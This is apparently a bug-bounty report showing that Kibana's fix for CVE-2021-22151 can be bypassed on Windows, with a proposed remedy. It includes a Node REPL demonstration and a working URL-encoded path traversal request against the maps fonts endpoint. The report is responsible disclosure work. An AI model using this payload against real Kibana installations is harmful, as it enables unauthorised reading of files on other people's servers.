Fix for CVE-2021-22151 (Kibana path traversal issue) can be bypassed on Windows

## Summary Hello team, I hope you're doing well! I was combing through your GitHub repository to look at the fixes for recent security releases and found [the fix for CVE-2021-22151](https://github.com/elastic/kibana/pull/107768) to be incomplete. The current fix makes assumptions that are true on Linux but that don't hold on Windows. ## Details The [fixed code](https://github.com/elastic/kibana/blob/62e7deee3c03cde99ae8f5da37352d0d5bd54d84/x-pack/plugins/maps/server/routes.js#L490-L494) looks like this ```typescript const range = path.normalize(request.params.range); return range.startsWith('..') ? response.notFound() : new Promise((resolve) => { const fontPath = path.join(__dirname, 'fonts', 'open_sans', `${range}.pbf`); fs.readFile(fontPath, (error, data) => { // snipped }); }); ``` The assumption is that any path traversal attempts, once normalized, will start with `..`. This seems to hold on Linux, however on Windows this can happen (using the NodeJS REPL for demonstration here): ```javascript > let range = path.normalize('c:../../../../../../../path_traversal') undefined > console.log(range) c:..\..\..\..\..\..\..\path_traversal > range.startsWith('..') false > const fontPath = path.join(__dirname, 'fonts', 'open_sans', `${range}.pbf`); undefined > console.log(fontPath) c:\path_traversal.pbf ``` Path traversal happened even if the `range` didn't start with `..`. ## Steps to reproduce This requires Kibana to be installed on Windows. 1. Put a `.pbf` file somewhere on disk for demonstration. I did it with `echo hax > c:\path_traversal.pbf` 1. Visit <http://localhost:5601/api/maps/fonts/open_sans/c%3A..%2F..%2F..%2F..%2F..%2F..%2F..%2Fpath_traversal> and the file from the previous step will be downloaded 1. You might need to add some `..%2f` depending on how deep Kibana is installed. ## Remediation Thom Heymann already had a great suggestion [in their code review](https://github.com/elastic/kibana/pull/107768/files#r683586289) > The best way to solve this is to resolve the path from range and ensure it is inside your fonts directory. I think this would fix the issue once and for all! ## Impact Path traversal disclosing `.pbf` files